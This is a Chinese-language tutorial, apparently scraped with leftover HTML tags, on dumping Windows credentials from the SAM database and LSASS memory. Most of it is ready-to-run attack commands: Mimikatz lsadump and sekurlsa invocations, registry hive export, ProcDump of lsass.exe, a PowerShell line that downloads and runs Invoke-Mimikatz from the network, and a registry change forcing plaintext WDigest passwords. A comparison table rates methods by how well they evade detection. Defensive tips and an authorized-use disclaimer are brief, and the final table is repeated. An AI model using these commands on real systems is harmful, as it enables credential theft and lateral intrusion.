Windows本地Hash抓取技术详解<\/h1>

1. 基础知识<\/h2>

在Windows操作系统中，用户凭证信息主要存储在以下两个位置：<\/p>

SAM数据库<\/strong>：位于C:\Windows\System32\config\sam<\/code>，保存本地用户的Hash<\/li>

LSASS进程内存<\/strong>：lsass.exe<\/code>进程会缓存用户密码信息<\/li> <\/ol> 2. 通过SAM数据库提取Hash<\/h2> 2.1 使用Mimikatz在线模式<\/h3> 前提条件<\/strong>：<\/p> 需要SYSTEM权限或模拟SYSTEM令牌<\/li> <\/ul> 操作步骤<\/strong>：<\/p> privilege::debug \/\/ 获取debug权限 token::elevate \/\/ 模拟SYSTEM令牌 lsadump::sam \/\/ 转储SAM数据库 <\/code><\/pre> 特点<\/strong>：<\/p> 使用简单<\/li> 特征明显，容易被安全产品拦截<\/li> <\/ul> 2.2 使用Mimikatz离线模式<\/h3> 操作步骤<\/strong>：<\/p> 导出注册表文件：<\/p> reg save hklm\sam sam.hiv reg save hklm\system system.hiv <\/code><\/pre> <\/li> 或者直接复制文件（需要工具如NinjaCopy）：<\/p> C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SAM <\/code><\/pre> <\/li> 使用Mimikatz解析：<\/p> lsadump::sam \/sam:sam.hiv \/system:system.hiv <\/code><\/pre> <\/li> <\/ol> 特点<\/strong>：<\/p> 需要导出文件，效率较低<\/li> 更安全，不易被检测<\/li> <\/ul> 3. 通过LSASS进程内存提取凭证<\/h2> 3.1 直接使用Mimikatz提取<\/h3> 前提条件<\/strong>：<\/p> Administrator权限（可通过privilege::debug<\/code>获取调试权限）<\/li> 或SYSTEM权限<\/li> <\/ul> 交互式提取<\/strong>：<\/p> privilege::debug log sekurlsa::logonpasswords <\/code><\/pre> 非交互式提取<\/strong>：<\/p> mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords full" exit <\/code><\/pre> 3.2 通过PowerShell加载Mimikatz<\/h3> 方法一<\/strong>（远程加载）：<\/p> powershell IEX (New-Object Net.WebClient).DownloadString('https:\/\/raw.githubusercontent.com\/mattifestation\/PowerSploit\/master\/Exfiltration\/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds <\/code><\/pre> 方法二<\/strong>（本地加载）：<\/p> powershell Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"privilege::debug" "log" "sekurlsa::logonPasswords full"' <\/code><\/pre> 3.3 通过LSASS转储文件提取<\/h3> 使用ProcDump导出LSASS内存：<\/p> procdump64.exe -accepteula -ma lsass.exe lsass.dmp <\/code><\/pre> <\/li> 使用Mimikatz解析转储文件：<\/p> mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit <\/code><\/pre> <\/li> <\/ol> 4. 其他工具<\/h2> Pwdump7<\/strong>：<\/p> 下载地址：http:\/\/passwords.openwall.net\/b\/pwdump\/pwdump7.zip<\/li> <\/ul> <\/li> PowerShell脚本<\/strong>：<\/p> powershell Import-Module .\Invoke-PowerDump.ps1; Invoke-PowerDump <\/code><\/pre> <\/li> QuarkPwDump<\/strong>：<\/p> 项目地址：https:\/\/github.com\/quarkslab\/quarkspwdump<\/li> 已编译版本：https:\/\/github.com\/redcanari\/quarkspwdump\/releases<\/li> <\/ul> <\/li> <\/ol> 5. 明文密码问题<\/h2> KB2871997补丁影响<\/strong>：<\/p> 会删除除wdigest SSP外的其他SSP的明文凭据<\/li> 对于wdigest SSP只能选择禁用<\/li> <\/ul> 启用wdigest获取明文密码<\/strong>：<\/p> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 \/f <\/code><\/pre> 6. 技术原理<\/h2> SAM数据库提取原理<\/strong>：<\/p> 读取hklm\system<\/code>获取syskey<\/li> 使用syskey解密hklm\sam<\/code><\/li> <\/ul> <\/li> LSASS内存提取原理<\/strong>：<\/p> 通过API MiniDumpWriteDump()<\/code>获得lsass.exe进程的dmp文件<\/li> 从内存中提取凭证信息<\/li> <\/ul> <\/li> <\/ol> 7. 防御与检测<\/h2> 在线模式<\/strong>：<\/p> 特征明显，容易被EDR\/AV检测<\/li> 建议使用离线模式或LSASS转储方式<\/li> <\/ul> <\/li> 防护措施<\/strong>：<\/p> 启用LSA保护<\/li> 限制调试权限<\/li> 监控lsass.exe进程的异常访问<\/li> <\/ul> <\/li> <\/ol> 8. 总结对比<\/h2> 方法<\/th> 优点<\/th> 缺点<\/th> 适用场景<\/th> <\/tr> <\/thead> 在线SAM提取<\/td> 简单直接<\/td> 易被检测<\/td> 快速测试<\/td> <\/tr> 离线SAM提取<\/td> 更安全<\/td> 需要导出文件<\/td> 隐蔽操作<\/td> <\/tr> 直接LSASS提取<\/td> 可获取更多信息<\/td> 高风险<\/td> 交互式环境<\/td> <\/tr> LSASS转储<\/td> 可离线分析<\/td> 需要额外步骤<\/td> 规避检测<\/td> <\/tr> PowerShell方式<\/td> 无文件落地<\/td> 可能被拦截<\/td> 红队操作<\/td> <\/tr> <\/tbody> <\/table> 掌握这些技术对于渗透测试和系统安全评估至关重要，但请确保只在合法授权的范围内使用这些技术。<\/p>

方法<\/th>	优点<\/th>	缺点<\/th>	适用场景<\/th> <\/tr> <\/thead>
在线SAM提取<\/td>	简单直接<\/td>	易被检测<\/td>	快速测试<\/td> <\/tr>
离线SAM提取<\/td>	更安全<\/td>	需要导出文件<\/td>	隐蔽操作<\/td> <\/tr>
直接LSASS提取<\/td>	可获取更多信息<\/td>	高风险<\/td>	交互式环境<\/td> <\/tr>
LSASS转储<\/td>	可离线分析<\/td>	需要额外步骤<\/td>	规避检测<\/td> <\/tr>
PowerShell方式<\/td>	无文件落地<\/td>	可能被拦截<\/td>	红队操作<\/td> <\/tr> <\/tbody> <\/table> 掌握这些技术对于渗透测试和系统安全评估至关重要，但请确保只在合法授权的范围内使用这些技术。<\/p>